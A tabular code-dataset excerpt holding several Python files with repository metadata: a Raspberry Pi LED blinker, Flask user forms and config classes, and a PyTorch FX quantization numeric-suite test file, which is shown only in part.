hexsha (string, len 40) | size (int64, 4-1.02M) | ext (string, 8 classes) | lang (string, 1 class) | max_stars_repo_path (string, len 4-209) | max_stars_repo_name (string, len 5-121) | max_stars_repo_head_hexsha (string, len 40) | max_stars_repo_licenses (sequence, len 1-10) | max_stars_count (int64, 1-191k, nullable) | max_stars_repo_stars_event_min_datetime (string, len 24, nullable) | max_stars_repo_stars_event_max_datetime (string, len 24, nullable) | max_issues_repo_path (string, len 4-209) | max_issues_repo_name (string, len 5-121) | max_issues_repo_head_hexsha (string, len 40) | max_issues_repo_licenses (sequence, len 1-10) | max_issues_count (int64, 1-67k, nullable) | max_issues_repo_issues_event_min_datetime (string, len 24, nullable) | max_issues_repo_issues_event_max_datetime (string, len 24, nullable) | max_forks_repo_path (string, len 4-209) | max_forks_repo_name (string, len 5-121) | max_forks_repo_head_hexsha (string, len 40) | max_forks_repo_licenses (sequence, len 1-10) | max_forks_count (int64, 1-105k, nullable) | max_forks_repo_forks_event_min_datetime (string, len 24, nullable) | max_forks_repo_forks_event_max_datetime (string, len 24, nullable) | content (string, len 4-1.02M) | avg_line_length (float64, 1.07-66.1k) | max_line_length (int64, 4-266k) | alphanum_fraction (float64, 0.01-1) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1ff1702bcb8da359b79def16dce5a4619ac6195a | 512 | py | Python | projects/blink1led/blink1led.py | johnnymast/Raspberry-pi-3B | 9bde1a17d07159a2773c1c23ec9cb30079a74105 | ["MIT"] | 1 | 2017-01-18T00:03:38.000Z | 2017-01-18T00:03:38.000Z | projects/blink1led/blink1led.py | johnnymast/Raspberry-pi-3B | 9bde1a17d07159a2773c1c23ec9cb30079a74105 | ["MIT"] | null | null | null | projects/blink1led/blink1led.py | johnnymast/Raspberry-pi-3B | 9bde1a17d07159a2773c1c23ec9cb30079a74105 | ["MIT"] | null | null | null |
#!/usr/bin/python
import RPi.GPIO as GPIO
import time

# Use physical board numbering: pin numbers refer to the header pins themselves
GPIO.setmode(GPIO.BOARD)
# Set pin 7 to be an output
GPIO.setup(7, GPIO.OUT)
try:
    while True:
        # Set pin 7 to HIGH so current flows and the LED turns on
        GPIO.output(7, GPIO.HIGH)
        # Wait half a second
        time.sleep(0.5)
        # Set pin 7 to LOW to turn the LED off
        GPIO.output(7, GPIO.LOW)
        # Wait half a second
        time.sleep(0.5)
finally:
    GPIO.cleanup()
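
# Illustrative sketch (not part of the original blink1led.py): the same blink
# loop factored into a reusable helper so the pin number and delay are not
# hard-coded. The `blink` name and its parameters are assumptions made for
# this example; it relies only on the RPi.GPIO calls already used above.
def blink(pin, interval=0.5):
    """Toggle `pin` forever, spending `interval` seconds in each state."""
    GPIO.setmode(GPIO.BOARD)
    GPIO.setup(pin, GPIO.OUT)
    try:
        while True:
            GPIO.output(pin, GPIO.HIGH)
            time.sleep(interval)
            GPIO.output(pin, GPIO.LOW)
            time.sleep(interval)
    finally:
        GPIO.cleanup(pin)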
| 18.285714 | 54 | 0.623047 |
87b615227acaacf27616211adb07c396afcd74d4 | 2,438 | py | Python | Flask/Blog/user/forms.py | LieonShelly/PythonFun | 811760d368885109f9359c2663d8ce74886f6ad6 | ["MIT"] | null | null | null | Flask/Blog/user/forms.py | LieonShelly/PythonFun | 811760d368885109f9359c2663d8ce74886f6ad6 | ["MIT"] | null | null | null | Flask/Blog/user/forms.py | LieonShelly/PythonFun | 811760d368885109f9359c2663d8ce74886f6ad6 | ["MIT"] | null | null | null |
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, BooleanField
from wtforms.validators import DataRequired, Length, Email, EqualTo, ValidationError
from flask_login import current_user
from Blog.user.models import User
from flask_wtf.file import FileAllowed, FileField
class RegistrationForm(FlaskForm):
username = StringField('Username', validators=[DataRequired(), Length(min=2, max=20)])
email = StringField("Email", validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('Confirm Password', validators=[DataRequired(), EqualTo('password')])
submit = SubmitField('Sign Up')
def validate_username(self, username):
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('That username is taken. Please choose a different one.')
def validate_email(self, email):
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('That email is taken. Please choose a different one.')
class LoginForm(FlaskForm):
email = StringField('Email', validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
remember = BooleanField('Remember Me')
submit = SubmitField('Login')
class UpdateAccountForm(FlaskForm):
username = StringField('Username', validators=[DataRequired(), Length(min=2, max=20)])
email = StringField('Email', validators=[DataRequired(), Email()])
picture = FileField('Update Profile Picture', validators=[FileAllowed(['jpg', 'png'])])
submit = SubmitField('Update')
class RequestResetForm(FlaskForm):
email = StringField('Email',
validators=[DataRequired(), Email()])
submit = SubmitField('Request Password Reset')
def validate_email(self, email):
user = User.query.filter_by(email=email.data).first()
if user is None:
raise ValidationError('There is no account with that email. You must register first.')
class ResetPasswordForm(FlaskForm):
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('Confirm Password',
validators=[DataRequired(), EqualTo('password')])
    submit = SubmitField('Reset Password')
| 44.327273 | 106 | 0.700164 |
f6fb5e91e68299b262be21f17347d7212104a56d | 1,140 | py | Python | config.py | jonathankamau/MovieBuff-API | 9ede6625b65f362b154aad0b3f525207aac77cdd | ["MIT"] | 1 | 2018-09-14T03:44:55.000Z | 2018-09-14T03:44:55.000Z | config.py | jonathankamau/MovieBuff-API | 9ede6625b65f362b154aad0b3f525207aac77cdd | ["MIT"] | 55 | 2020-06-03T02:48:43.000Z | 2021-07-22T02:45:54.000Z | config.py | jonathankamau/MovieBuff-API | 9ede6625b65f362b154aad0b3f525207aac77cdd | ["MIT"] | 1 | 2018-12-17T16:30:09.000Z | 2018-12-17T16:30:09.000Z |
"""App environment configurations."""
import os
from dotenv import load_dotenv
dotenv_path = os.path.join(os.path.dirname(__file__), '.env')
load_dotenv(dotenv_path)
class Development():
"""Model Development enviroment config object."""
DEBUG = True
DEVELOPMENT = True
SQLALCHEMY_DATABASE_URI = os.environ.get('LOCAL_DATABASE')
SQLALCHEMY_TRACK_MODIFICATIONS = True
class Testing():
"""Model Testing environment config object."""
DEBUG = True
TESTING = True
SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE')
SQLALCHEMY_TRACK_MODIFICATIONS = True
class Staging():
"""Model Development enviroment config object."""
DEBUG = True
STAGING = True
SQLALCHEMY_DATABASE_URI = os.environ.get('STAGING_DATABASE')
SQLALCHEMY_TRACK_MODIFICATIONS = True
class Production():
"""Model Development enviroment config object."""
DEBUG = True
PRODUCTION = True
SQLALCHEMY_DATABASE_URI = os.environ.get('PRODUCTION_DATABASE')
env_configuration = {
'development': Development,
'testing': Testing,
'staging': Staging,
'production': Production
}
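
# Illustrative usage sketch (not part of the original config.py): one way the
# env_configuration mapping above could be consumed by a Flask application
# factory. The FLASK_ENV variable name and the create_app helper are
# assumptions made for this example, not part of the MovieBuff-API project.
from flask import Flask


def create_app(env_name=None):
    """Build a Flask app configured for the requested environment."""
    env_name = env_name or os.environ.get('FLASK_ENV', 'development')
    app = Flask(__name__)
    app.config.from_object(env_configuration[env_name])
    return app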
| 21.509434 | 67 | 0.712281 |
5e67c3d44eaa957f5224995cba079b36392ebbce | 23 | py | Python | pandora-ckz/pandora/infinite/models.py | williamlagos/django-coding | 246dc1aba32eae0b035c407de3e8fe954606b776 | ["MIT"] | 4 | 2015-06-30T11:24:14.000Z | 2018-06-03T05:32:18.000Z | smartagent/models.py | jamespacileo/django-smartagent | 568a8843744b138199f72c14b68ed2f1ec841571 | ["MIT"] | 21 | 2020-03-24T18:18:22.000Z | 2021-03-31T20:18:53.000Z | smartagent/models.py | jamespacileo/django-smartagent | 568a8843744b138199f72c14b68ed2f1ec841571 | ["MIT"] | null | null | null |
__author__ = 'James'
| 11.5 | 20 | 0.652174 |
a4651bb7c77dd2a3c977d670c9a4ebd693658104 | 81,013 | py | Python | test/quantization/fx/test_numeric_suite_fx.py | gardenia22/pytorch | deb6989880d8a62bb45ce6c6b058bb5d2e28cf91 | ["Intel"] | 60,067 | 2017-01-18T17:21:31.000Z | 2022-03-31T21:37:45.000Z | test/quantization/fx/test_numeric_suite_fx.py | Jam3/pytorch | 33d8769c285b51922c378d11a90a442a28e06762 | ["Intel"] | 66,955 | 2017-01-18T17:21:38.000Z | 2022-03-31T23:56:11.000Z | test/quantization/fx/test_numeric_suite_fx.py | Jam3/pytorch | 33d8769c285b51922c378d11a90a442a28e06762 | ["Intel"] | 19,210 | 2017-01-18T17:45:04.000Z | 2022-03-31T23:51:56.000Z |
import copy
import math
import operator
import unittest
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.ao.quantization import default_dynamic_qconfig
import torch.nn.quantized as nnq
toq = torch.ops.quantized
from torch.ao.quantization.quantize_fx import (
convert_fx,
prepare_fx,
prepare_qat_fx,
)
from torch.testing._internal.common_quantization import (
ConvBnModel,
ConvBnReLUModel,
ConvModel,
QuantizationTestCase,
skipIfNoFBGEMM,
SingleLayerLinearDynamicModel,
SingleLayerLinearModel,
LSTMwithHiddenDynamicModel,
SparseNNModel,
skip_if_no_torchvision,
)
from torch.ao.quantization.quantization_mappings import (
get_default_static_quant_module_mappings,
get_default_dynamic_quant_module_mappings,
get_default_float_to_quantized_operator_mappings,
)
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_quantization import NodeSpec as ns
from torch.ao.quantization.fx.pattern_utils import get_default_quant_patterns
import torch.ao.quantization.fx.quantization_patterns as qp
from torch.ao.ns.fx.pattern_utils import (
get_type_a_related_to_b,
)
from torch.ao.ns.fx.graph_matcher import (
get_matching_subgraph_pairs,
GraphMatchingException,
)
from torch.ao.ns.fx.utils import (
compute_sqnr,
compute_normalized_l2_error,
compute_cosine_similarity,
)
from torch.ao.ns.fx.mappings import (
get_node_type_to_io_type_map,
get_unmatchable_types_map,
get_base_name_to_sets_of_related_ops,
get_base_name_for_op,
add_op_to_sets_of_related_ops,
)
from torch.ao.ns.fx.weight_utils import (
get_op_to_type_to_weight_extraction_fn,
)
from torch.ao.ns._numeric_suite_fx import (
extract_weights,
_extract_weights_impl,
add_loggers,
_add_loggers_impl,
OutputLogger,
add_shadow_loggers,
_add_shadow_loggers_impl,
extract_logger_info,
extract_shadow_logger_info,
extend_logger_results_with_comparison,
)
# Note: these models are not for use outside of this file. While it's good
# to reuse code, we also need to be able to iterate on tests
# quickly when debugging. If a test model has a large number of callsites
# across various different files, speed of debugging on individual test cases
# decreases.
class LinearReluFunctional(nn.Module):
def __init__(self):
super().__init__()
self.w1 = nn.Parameter(torch.empty(4, 4))
self.b1 = nn.Parameter(torch.zeros(4))
torch.nn.init.kaiming_uniform_(self.w1, a=math.sqrt(5))
def forward(self, x):
x = F.linear(x, self.w1, self.b1)
x = F.relu(x)
return x
class LinearFunctional(nn.Module):
def __init__(self):
super().__init__()
self.w1 = nn.Parameter(torch.empty(4, 4))
self.b1 = nn.Parameter(torch.zeros(4))
torch.nn.init.kaiming_uniform_(self.w1, a=math.sqrt(5))
def forward(self, x):
x = F.linear(x, self.w1, self.b1)
return x
class LinearReluLinearFunctional(nn.Module):
def __init__(self):
super().__init__()
self.w = nn.Parameter(torch.Tensor(4, 4))
self.b = nn.Parameter(torch.zeros(4))
torch.nn.init.kaiming_uniform_(self.w, a=math.sqrt(5))
def forward(self, x):
x = F.linear(x, self.w, self.b)
x = F.relu(x)
x = F.linear(x, self.w, self.b)
return x
class AddMulFunctional(nn.Module):
def forward(self, x, y):
x = x + 1.0
x = x * 1.0
x = 1.0 + x
x = 1.0 * x
x = x + y
x = x * y
return x
class AllConvAndLinearFusionModules(torch.nn.Module):
def __init__(self):
super().__init__()
# conv1d
self.conv1d_0 = nn.Conv1d(1, 1, 1)
# conv1d - relu
self.conv1d_1 = nn.Conv1d(1, 1, 1)
self.relu_0 = nn.ReLU()
# conv1d - bn (qat only)
self.conv1d_2 = nn.Conv1d(1, 1, 1)
self.bn1d_0 = nn.BatchNorm1d(1)
# conv1d - bn - relu (qat only)
self.conv1d_3 = nn.Conv1d(1, 1, 1)
self.bn1d_1 = nn.BatchNorm1d(1)
self.relu_4 = nn.ReLU()
# conv2d
self.conv2d_0 = nn.Conv2d(1, 1, 1)
# conv2d - relu
self.conv2d_1 = nn.Conv2d(1, 1, 1)
self.relu_1 = nn.ReLU()
# conv2d - bn (qat only)
self.conv2d_2 = nn.Conv2d(1, 1, 1)
self.bn2d_0 = nn.BatchNorm2d(1)
# conv2d - bn - relu (qat only)
self.conv2d_3 = nn.Conv2d(1, 1, 1)
self.bn2d_1 = nn.BatchNorm2d(1)
self.relu_5 = nn.ReLU()
# conv3d
self.conv3d_0 = nn.Conv3d(1, 1, 1)
# conv3d - relu
self.conv3d_1 = nn.Conv3d(1, 1, 1)
self.relu_2 = nn.ReLU()
# conv3d - bn (qat only)
self.conv3d_2 = nn.Conv3d(1, 1, 1)
self.bn3d_0 = nn.BatchNorm3d(1)
# conv3d - bn - relu (qat only)
self.conv3d_3 = nn.Conv3d(1, 1, 1)
self.bn3d_1 = nn.BatchNorm3d(1)
self.relu_6 = nn.ReLU()
# linear
self.linear_0 = nn.Linear(1, 1)
# linear - relu
self.linear_1 = nn.Linear(1, 1)
self.relu_3 = nn.ReLU()
def forward(self, x):
# conv1d
x = self.conv1d_0(x)
x = self.conv1d_1(x)
x = self.relu_0(x)
x = self.conv1d_2(x)
x = self.bn1d_0(x)
x = self.conv1d_3(x)
x = self.bn1d_1(x)
x = self.relu_4(x)
# conv2d
x = x.reshape(1, 1, 1, 1)
x = self.conv2d_0(x)
x = self.conv2d_1(x)
x = self.relu_1(x)
x = self.conv2d_2(x)
x = self.bn2d_0(x)
x = self.conv2d_3(x)
x = self.bn2d_1(x)
x = self.relu_5(x)
# conv3d
x = x.reshape(1, 1, 1, 1, 1)
x = self.conv3d_0(x)
x = self.conv3d_1(x)
x = self.relu_2(x)
x = self.conv3d_2(x)
x = self.bn3d_0(x)
x = self.conv3d_3(x)
x = self.bn3d_1(x)
x = self.relu_6(x)
# linear
x = x.reshape(1, 1)
x = self.linear_0(x)
x = self.linear_1(x)
x = self.relu_3(x)
return x
class AllConvFunctional(torch.nn.Module):
def __init__(self, weight1d, weight2d, weight3d, bias1d, bias2d, bias3d):
super().__init__()
self.weight1d = torch.nn.Parameter(weight1d)
self.weight2d = torch.nn.Parameter(weight2d)
self.weight3d = torch.nn.Parameter(weight3d)
self.bias1d = torch.nn.Parameter(bias1d)
self.bias2d = torch.nn.Parameter(bias2d)
self.bias3d = torch.nn.Parameter(bias3d)
self.stride1d = 1
self.padding1d = 0
self.dilation1d = 1
self.stride2d = (1, 1)
self.padding2d = (0, 0)
self.dilation2d = (1, 1)
self.groups = 1
self.stride3d = (1, 1, 1)
self.padding3d = (0, 0, 0)
self.dilation3d = (1, 1, 1)
def forward(self, x):
x = F.conv1d(
x, self.weight1d, self.bias1d, self.stride1d, self.padding1d,
self.dilation1d, self.groups)
x = F.conv1d(
x, self.weight1d, self.bias1d, self.stride1d, self.padding1d,
self.dilation1d, self.groups)
x = F.relu(x)
x = F.conv2d(
x, self.weight2d, self.bias2d, self.stride2d, self.padding2d,
self.dilation2d, self.groups)
x = F.conv2d(
x, self.weight2d, self.bias2d, self.stride2d, self.padding2d,
self.dilation2d, self.groups)
x = F.relu(x)
x = F.conv3d(
x, self.weight3d, self.bias3d, self.stride3d, self.padding3d,
self.dilation3d, self.groups)
x = F.conv3d(
x, self.weight3d, self.bias3d, self.stride3d, self.padding3d,
self.dilation3d, self.groups)
x = F.relu(x)
return x
@torch.fx.wrap
def _wrapped_hardswish(x):
return F.hardswish(x)
@torch.fx.wrap
def _wrapped_hardswish_fp16(x):
x = x.dequantize()
x = F.hardswish(x)
x = x.to(torch.float16)
return x
@torch.fx.wrap
def _wrapped_sigmoid(x):
return F.sigmoid(x)
@torch.fx.wrap
def _wrapped_linear(x, w, b):
return F.linear(x, w, b)
class TestFXGraphMatcher(QuantizationTestCase):
@skipIfNoFBGEMM
def test_simple_mod(self):
m = nn.Sequential(nn.Conv2d(1, 1, 1)).eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
results = get_matching_subgraph_pairs(mp, mq)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
conv_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, nn.Conv2d) + '_0'
expected_types = {
conv_name_0: ((nn.Conv2d, torch.ao.quantization.MinMaxObserver), (nnq.Conv2d, nnq.Conv2d)),
}
self.assert_types_for_matched_subgraph_pairs(results, expected_types, mp, mq)
@skipIfNoFBGEMM
def test_simple_fun(self):
class M(nn.Module):
def __init__(self):
super().__init__()
self.w = nn.Parameter(torch.empty(1, 4))
self.b = nn.Parameter(torch.zeros(1))
torch.nn.init.kaiming_uniform_(self.w, a=math.sqrt(5))
def forward(self, x):
return F.linear(x, self.w, self.b)
m = M().eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
results = get_matching_subgraph_pairs(mp, mq)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
linear_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, F.linear) + '_0'
expected_types = {
linear_name_0:
((F.linear, torch.ao.quantization.MinMaxObserver), (toq.linear, toq.linear))
}
self.assert_types_for_matched_subgraph_pairs(results, expected_types, mp, mq)
@skipIfNoFBGEMM
def test_simple_fusion(self):
m = LinearReluFunctional().eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
results = get_matching_subgraph_pairs(mp, mq)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
linear_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, F.linear) + '_0'
expected_types = {
linear_name_0:
((F.linear, torch.ao.quantization.MinMaxObserver), (toq.linear_relu, toq.linear_relu)),
}
self.assert_types_for_matched_subgraph_pairs(results, expected_types, mp, mq)
@skipIfNoFBGEMM
def test_simple_mod_multi(self):
m = nn.Sequential(
nn.Sequential(
nn.Conv2d(1, 1, 1),
),
nn.Conv2d(1, 1, 1),
).eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
# assume success if no exceptions
results = get_matching_subgraph_pairs(mp, mq)
@skipIfNoFBGEMM
def test_simple_tensor_ops(self):
class M(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
z = x + y
return z
m = M().eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
# assume success if no exceptions
results = get_matching_subgraph_pairs(mp, mq)
@skipIfNoFBGEMM
def test_matching_failure_node_count(self):
# verify that matching graphs with matching node types but
# different counts of matchable nodes fails
m1 = nn.Sequential(nn.Conv2d(1, 1, 1)).eval()
m2 = nn.Sequential(nn.Conv2d(1, 1, 1), nn.Conv2d(1, 1, 1)).eval()
mp1 = prepare_fx(m1, {'': torch.ao.quantization.default_qconfig})
mp2 = prepare_fx(m2, {'': torch.ao.quantization.default_qconfig})
with self.assertRaises(GraphMatchingException) as ex:
results = get_matching_subgraph_pairs(mp1, mp2)
@skipIfNoFBGEMM
def test_matching_failure_node_type(self):
# verify that matching graphs with non-matching node types fails
m1 = nn.Sequential(nn.Conv2d(1, 1, 1)).eval()
m2 = nn.Sequential(nn.Linear(1, 1)).eval()
mp1 = prepare_fx(m1, {'': torch.ao.quantization.default_qconfig})
mp2 = prepare_fx(m2, {'': torch.ao.quantization.default_qconfig})
with self.assertRaises(GraphMatchingException) as ex:
results = get_matching_subgraph_pairs(mp1, mp2)
@skipIfNoFBGEMM
def test_nodes_before_cat(self):
# verify that nodes before cat get matched
class M(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x0):
x1 = torch.add(x0, 1.0)
y1 = torch.add(x0, 1.0)
x2 = torch.cat([x1, y1])
return x2
m = M().eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
results = get_matching_subgraph_pairs(mp, mq)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
cat_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.cat) + '_0'
add_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.add) + '_0'
add_name_1 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.add) + '_1'
expected_types = {
cat_name_0: ((torch.cat, torch.cat), (torch.cat, torch.cat)),
add_name_0: ((torch.add, torch.ao.quantization.MinMaxObserver), (toq.add, toq.add)),
add_name_1: ((torch.add, torch.ao.quantization.MinMaxObserver), (toq.add, toq.add)),
}
self.assert_types_for_matched_subgraph_pairs(results, expected_types, mp, mq)
@skipIfNoFBGEMM
def test_dict_return_type(self):
# verify that we can traverse up nodes which return dictionaries
class M(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x0):
x1 = torch.add(x0, 1.0)
y1 = torch.add(x0, 1.0)
z1 = torch.add(x0, 1.0)
a1 = {'x1': x1, 'y1': (y1,), 'z1': [{'key': (z1,)}]}
return a1
m = M().eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
results = get_matching_subgraph_pairs(mp, mq)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
add_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.add) + '_0'
add_name_1 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.add) + '_1'
add_name_2 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.add) + '_2'
expected_types = {
add_name_0: ((torch.add, torch.ao.quantization.MinMaxObserver), (toq.add, toq.add)),
add_name_1: ((torch.add, torch.ao.quantization.MinMaxObserver), (toq.add, toq.add)),
add_name_2: ((torch.add, torch.ao.quantization.MinMaxObserver), (toq.add, toq.add)),
}
self.assert_types_for_matched_subgraph_pairs(results, expected_types, mp, mq)
@skipIfNoFBGEMM
@unittest.skip("Broken by https://github.com/pytorch/pytorch/pull/62608, need dtype inference support")
def test_nodes_with_equal_types_get_matched(self):
class M(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1, 1, 1)
self.conv2 = nn.Conv2d(1, 1, 1)
def forward(self, x):
x = self.conv1(x)
x = self.conv2(x)
x = torch.mul(x, x)
x = torch.sigmoid(x)
x = F.relu(x)
return x
m = M().eval()
# prevent conv2 from getting quantized, so we can test
# modules with equal types
qconfig_dict = {
'': torch.ao.quantization.default_qconfig,
'module_name': [('conv2', None)],
}
mp = prepare_fx(m, qconfig_dict)
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
results = get_matching_subgraph_pairs(mp, mq)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
conv_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, nn.Conv2d) + '_0'
conv_name_1 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, nn.Conv2d) + '_1'
mul_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.mul) + '_0'
relu_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.relu) + '_0'
sigmoid_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.sigmoid) + '_0'
# all of these should be matched
expected_types = {
conv_name_1:
((nn.Conv2d, torch.ao.quantization.MinMaxObserver), (nnq.Conv2d, nnq.Conv2d)),
conv_name_0:
((nn.Conv2d, torch.ao.quantization.MinMaxObserver), (nn.Conv2d, nn.Conv2d)),
mul_name_0: ((torch.mul, torch.ao.quantization.MinMaxObserver), (toq.mul, toq.mul)),
relu_name_0: ((F.relu, torch.ao.quantization.MinMaxObserver), (F.relu, F.relu)),
sigmoid_name_0:
((torch.sigmoid, torch.sigmoid), (torch.sigmoid, torch.sigmoid)),
}
self.assert_types_for_matched_subgraph_pairs(results, expected_types, mp, mq)
@unittest.skip("Broken by https://github.com/pytorch/pytorch/pull/62608, need dtype inference support")
def test_methods(self):
"""
Verify that graph matching works on methods
"""
class M(nn.Module):
def forward(self, x):
x = x.sigmoid()
return x
m1 = M().eval()
m2 = M().eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
m1p = prepare_fx(m1, qconfig_dict)
m2p = prepare_fx(m2, qconfig_dict)
results = get_matching_subgraph_pairs(m1p, m2p)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
sigmoid_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.sigmoid) + '_0'
expected_types = {
sigmoid_name_0:
(('sigmoid', 'sigmoid'), ('sigmoid', 'sigmoid')),
}
self.assert_types_for_matched_subgraph_pairs(
results, expected_types, m1p, m2p)
def test_op_relationship_mapping(self):
"""
Tests that the mapping of op relationships is complete.
"""
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
type_a_related_to_b = \
get_type_a_related_to_b(base_name_to_sets_of_related_ops)
# 1. check static quant module mappings
static_quant_mod_mappings = get_default_static_quant_module_mappings()
for fp32_type, int8_type in static_quant_mod_mappings.items():
# skip quants and dequants, for the purposes of Numerical Suite
types_to_skip = (
torch.ao.quantization.QuantStub,
torch.ao.quantization.DeQuantStub,
nnq.FloatFunctional,
)
if fp32_type in types_to_skip:
continue
# verify relatedness
in_type_a_related_to_b = \
(fp32_type, int8_type) in type_a_related_to_b
self.assertTrue(
in_type_a_related_to_b,
f"{fp32_type} and {int8_type} need a relationship mapping")
# 2. check static quant op mappings
static_quant_fun_mappings = get_default_float_to_quantized_operator_mappings()
for fp32_type, int8_type in static_quant_fun_mappings.items():
# verify relatedness
in_type_a_related_to_b = \
(fp32_type, int8_type) in type_a_related_to_b
self.assertTrue(
in_type_a_related_to_b,
f"{fp32_type} and {int8_type} need a relationship mapping")
# 3. check dynamic quant mappings
dynamic_quant_mappings = get_default_dynamic_quant_module_mappings()
for fp32_type, int8_type in dynamic_quant_mappings.items():
# TODO(future PR): enable correct weight extraction for these
# and remove from this list.
types_to_skip = (
nn.GRUCell,
nn.GRU,
nn.LSTMCell,
nn.RNNCell,
)
if fp32_type in types_to_skip:
continue
# verify relatedness
in_type_a_related_to_b = \
(fp32_type, int8_type) in type_a_related_to_b
self.assertTrue(
in_type_a_related_to_b,
f"{fp32_type} and {int8_type} need a relationship mapping")
# 4. go through the ops mapped to each QuantizeHandler type, and verify
# correctness.
def _op_in_base_sets_of_related_ops(op):
for name, ops in base_name_to_sets_of_related_ops.items():
if op in ops:
return True
return False
unmatchable_types_map = get_unmatchable_types_map()
FUNS_UNMATCHABLE = unmatchable_types_map['funs_unmatchable']
MODS_UNMATCHABLE = unmatchable_types_map['mods_unmatchable']
METHS_UNMATCHABLE = unmatchable_types_map['meths_unmatchable']
def _op_is_unmatchable(op):
return (
op in FUNS_UNMATCHABLE or
op in MODS_UNMATCHABLE or
op in METHS_UNMATCHABLE
)
default_quant_patterns = get_default_quant_patterns()
for pattern, qhandler_cls in default_quant_patterns.items():
base_op = None
if isinstance(pattern, tuple):
base_op = pattern[-1]
elif isinstance(pattern, str):
base_op = pattern
else:
base_op = pattern
qhandler_cls_all_ops_quantizeable = [
qp.CatQuantizeHandler,
qp.ConvReluQuantizeHandler,
qp.LinearReLUQuantizeHandler,
qp.BatchNormQuantizeHandler,
qp.EmbeddingQuantizeHandler,
qp.RNNDynamicQuantizeHandler,
]
qhandler_cls_quant_op_same_signature = [
qp.FixedQParamsOpQuantizeHandler,
qp.CopyNodeQuantizeHandler,
qp.GeneralTensorShapeOpQuantizeHandler,
]
if qhandler_cls == qp.BinaryOpQuantizeHandler:
# these ops do not have quantized equivalents
ops_to_skip = [
torch.bmm,
torch.div,
torch.sub,
operator.truediv,
operator.sub
]
if base_op in ops_to_skip:
continue
self.assertTrue(
_op_in_base_sets_of_related_ops(base_op),
f"{base_op} not in sets of related ops")
elif qhandler_cls == qp.RNNDynamicQuantizeHandler:
# TODO(future PR): add support for all classes in
# RNNDynamicQuantizeHandler
pass
elif qhandler_cls == qp.DefaultNodeQuantizeHandler:
# torch.sum does not have quantized equivalents
if base_op == torch.sum:
continue
self.assertTrue(
_op_in_base_sets_of_related_ops(base_op),
f"{base_op} not in sets of related ops")
elif qhandler_cls in qhandler_cls_quant_op_same_signature:
# these ops use the same op signature for fp32 and quantized
# tensors
self.assertTrue(
_op_in_base_sets_of_related_ops(base_op) or
_op_is_unmatchable(base_op),
f"{base_op} not in sets of related ops or unmatchable")
elif qhandler_cls in qhandler_cls_all_ops_quantizeable:
self.assertTrue(
_op_in_base_sets_of_related_ops(base_op),
f"{base_op} not in sets of related ops")
else:
raise AssertionError(
f"handing for {qhandler_cls} not implemented")
@skipIfNoFBGEMM
def test_user_defined_function(self):
"""
Verify that graph matching works on user defined functions
"""
class M1(nn.Module):
def forward(self, x):
x = F.hardswish(x)
return x
class M2(nn.Module):
def forward(self, x):
x = _wrapped_hardswish(x)
return x
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
m1 = prepare_fx(M1().eval(), qconfig_dict)
m2 = prepare_fx(M2().eval(), qconfig_dict)
